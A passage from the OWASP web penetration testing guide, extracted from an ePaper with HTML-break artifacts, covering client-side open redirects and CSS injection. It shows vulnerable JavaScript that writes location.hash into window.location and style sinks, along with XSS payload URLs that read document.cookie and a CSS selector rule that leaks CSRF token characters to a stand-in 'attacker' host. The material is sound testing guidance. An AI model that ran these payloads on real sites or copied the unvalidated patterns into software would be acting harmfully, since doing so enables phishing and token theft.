1BO4r2U
1BO4r2U
1BO4r2U
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
189 190<br />
Web Application Penetration Testing<br />
Web Application Penetration Testing<br />
Whitepapers<br />
• Browser location/document URI/URL Sources - https://code.<br />
google.com/p/domxsswiki/wiki/LocationSources<br />
• i.e., what is returned when the user asks the browser for things like<br />
document.URL, document.baseURI, location, location.href, etc.<br />
Testing for Client Side URL Redirect<br />
(OTG-CLIENT-004)<br />
Summary<br />
This section describes how to check for Client Side URL Redirection,<br />
also known as Open Redirection. It is an input validation flaw that exists<br />
when an application accepts an user controlled input which specifies<br />
a link that leads to an external URL that could be malicious. This<br />
kind of vulnerability could be used to accomplish a phishing attack or<br />
redirect a victim to an infection page.<br />
How to Test<br />
This vulnerability occurs when an application accepts untrusted input<br />
that contains an URL value without sanitizing it. This URL value could<br />
cause the web application to redirect the user to another page as, for<br />
example, a malicious page controlled by the attacker.<br />
By modifying untrusted URL input to a malicious site, an attacker may<br />
successfully launch a phishing scam and steal user credentials. Since<br />
the redirection is originated by the real application, the phishing attempts<br />
may have a more trustworthy appearance.<br />
A phishing attack example could be the following:<br />
http:/www.target.site?#redirect=www.fake-target.site<br />
The victim that visits target.site will be automatically redirected to<br />
fake-target.site where an attacker could place a fake page to steal<br />
victim’s credentials.<br />
Moreover open redirections could also be used to maliciously craft an<br />
URL that would bypass the application’s access control checks and<br />
then forward the attacker to privileged functions that they would<br />
normally not be able to access.<br />
Black Box testing<br />
Black box testing for Client Side URL Redirect is not usually performed<br />
since access to the source code is always available as it needs to be<br />
sent to the client to be executed.<br />
Gray Box testing<br />
Testing for Client Side URL Redirect vulnerabilities:<br />
When testers have to manually check for this type of vulnerability<br />
they have to identify if there are client side redirections implemented<br />
in the client side code (for example in the JavaScript code).<br />
These redirections could be implemented, for example in JavaScript,<br />
using the “window.location” object that can be used to take the<br />
browser to another page by simply assigning a string to it. (as you can<br />
see in the following snippet of code).<br />
var redir = location.hash.substring(1);<br />
if (redir)<br />
window.location=’http:/’+decodeURIComponent(redir);<br />
In the previous example the script does not perform any validation<br />
of the variable “redir”, that contains the user supplied input via the<br />
query string, and in the same time does not apply any form of encoding,<br />
then this unvalidated input is passed to the windows.location<br />
object originating a URL redirection vulnerability.<br />
This implies that an attacker could redirect the victim to a malicious<br />
site simply by submitting the following query string:<br />
http:/www.victim.site/?#www.malicious.site<br />
Note how, if the vulnerable code is the following:<br />
var redir = location.hash.substring(1);<br />
if (redir)<br />
window.location=decodeURIComponent(redir);<br />
It also could be possible to inject JavaScript code, for example by submitting<br />
the following query string:<br />
http:/www.victim.site/?#javascript:alert(document.cookie)<br />
When trying to check for this kind of issues, consider that some<br />
characters are treated differently by different browsers.<br />
Moreover always consider the possibility to try absolute URLs<br />
variants as described here: http://kotowicz.net/absolute/<br />
Tools<br />
• DOMinator - https://dominator.mindedsecurity.com/<br />
References<br />
OWASP Resources<br />
• DOM based XSS Prevention Cheat Sheet<br />
• DOMXSS.com - http://www.domxss.com<br />
Whitepapers<br />
• Browser location/document URI/URL Sources - https://code.<br />
google.com/p/domxsswiki/wiki/LocationSources<br />
• i.e., what is returned when you ask the browser for things like<br />
document.URL, document.baseURI, location, location.href, etc.<br />
• Krzysztof Kotowicz: “Local or Externa? Weird URL formats on<br />
the loose” - http://kotowicz.net/absolute/<br />
Testing for CSS Injection (OTG-CLIENT-005)<br />
Summary<br />
A CSS Injection vulnerability involves the ability to inject arbitrary<br />
CSS code in the context of a trusted web site, and this will be rendered<br />
inside the victim’s browser. The impact of such a vulnerability<br />
may vary on the basis of the supplied CSS payload: it could<br />
lead to Cross-Site Scripting in particular circumstances, to data<br />
exfiltration in the sense of extracting sensitive data or to UI modifications.<br />
How to Test<br />
Such a vulnerability occurs when the application allows to supply<br />
user-generated CSS or it is possible to somehow interfere with the<br />
legit stylesheets. Injecting code in the CSS context gives the attacker<br />
the possibility to execute JavaScript in certain conditions as well as<br />
extracting sensitive values through CSS selectors and functions able<br />
to generate HTTP requests. Actually, giving the users the possibility<br />
to customize their own personal pages by using custom CSS files results<br />
in a considerable risk, and should be definitely avoided.<br />
The following JavaScript code shows a possible vulnerable script<br />
in which the attacker is able to control the “location.hash” (source)<br />
which reaches the “cssText” function (sink). This particular case may<br />
lead to DOMXSS in older browser versions, such as Opera, Internet<br />
Explorer and Firefox; for reference see DOM XSS Wiki, section “Style<br />
Sinks”.<br />
Click me<br />
<br />
if (location.hash.slice(1)) {<br />
document.getElementById(“a1”).style.cssText = “color: “ +<br />
location.hash.slice(1);<br />
}<br />
<br />
Specifically the attacker could target the victim by asking her to visit<br />
the following URLs:<br />
• www.victim.com/#red;-o-link:’javascript:alert(1)’;-o-linksource:current;<br />
(Opera [8,12])<br />
• www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)<br />
The same vulnerability may appear in the case of classical reflected<br />
XSS in which for instance the PHP code looks like the following:<br />
<br />
p {<br />
color: ;<br />
text-align: center;<br />
}<br />
<br />
Much more interesting attack scenarios involve the possibility to<br />
extract data through the adoption of pure CSS rules. Such attacks<br />
can be conducted through CSS selectors and leading for instance to<br />
grab anti-CSRF tokens, as follows. In particular, input[name=csrf_<br />
token][value=^a] represents an element with the attribute “name”<br />
set “csrf_token” and whose attribute “value” starts with “a”. By detecting<br />
the length of the attribute “value”, it is possible to carry out<br />
a brute force attack against it and send its value to the attacker’s<br />
domain.<br />
<br />
input[name=csrf_token][value=^a] {<br />
background-image: url(http:/attacker/log?a);<br />
}<br />
<br />
Much more modern attacks involving a combination of SVG, CSS and<br />
HTML5 have been proven feasible, therefore we recommend to see<br />
the References section for details.<br />
Black Box testing<br />
We are referring to client-side testing, therefore black box testing<br />
is not usually performed since access to the source code is always<br />
available as it needs to be sent to the client to be executed. However,<br />
it may happen that the user is given a certain degree of freedom in<br />
terms of possibilities to supply HTML code; in that case it is required<br />
to test whether no CSS injections are possible: tags like “link” and<br />
“style” should be disallowed, as well as attributes “style”.<br />
Gray Box testing<br />
Testing for CSS Injection vulnerabilities:<br />
Manual testing needs to be conducted and the JavaScript code analyzed<br />
in order to understand whether the attackers can inject its own<br />
content in CSS context. In particular we should be interested in how<br />
the website returns CSS rules on the basis of the inputs.<br />
The following is a basic example:<br />
Click me<br />
Hi<br />
<br />
$(“a”).click(function(){<br />
$(“b”).attr(“style”,”color: “ + location.hash.slice(1));<br />
});<br />
<br />
The above code contains a source “location.hash” that is controlled<br />
by the attacker that can inject directly in the attribute “style” of an<br />
HTML element. As mentioned above, this may lead to different results<br />
on the basis of the adopted browser and the supplied payload.<br />
It is recommended that testers use the jQuery function css(property,<br />
value) in such circumstances as follows, since this would disallow<br />
any damaging injections. In general, we recommend to use always a<br />
whitelist of allowed characters any time the input is reflected in the<br />
CSS context.<br />
Click me<br />
Hi<br />
<br />
$(“a”).click(function(){<br />
$(“b”).css(“color”,location.hash.slice(1));<br />
});<br />
<br />
References<br />
OWASP Resources<br />
• DOM based XSS Prevention Cheat Sheet<br />
• DOMXSS Wiki - https://code.google.com/p/domxsswiki/wiki/<br />
CssText<br />
Presentations<br />
• DOM Xss Identification and Exploitation, Stefano Di Paola - http://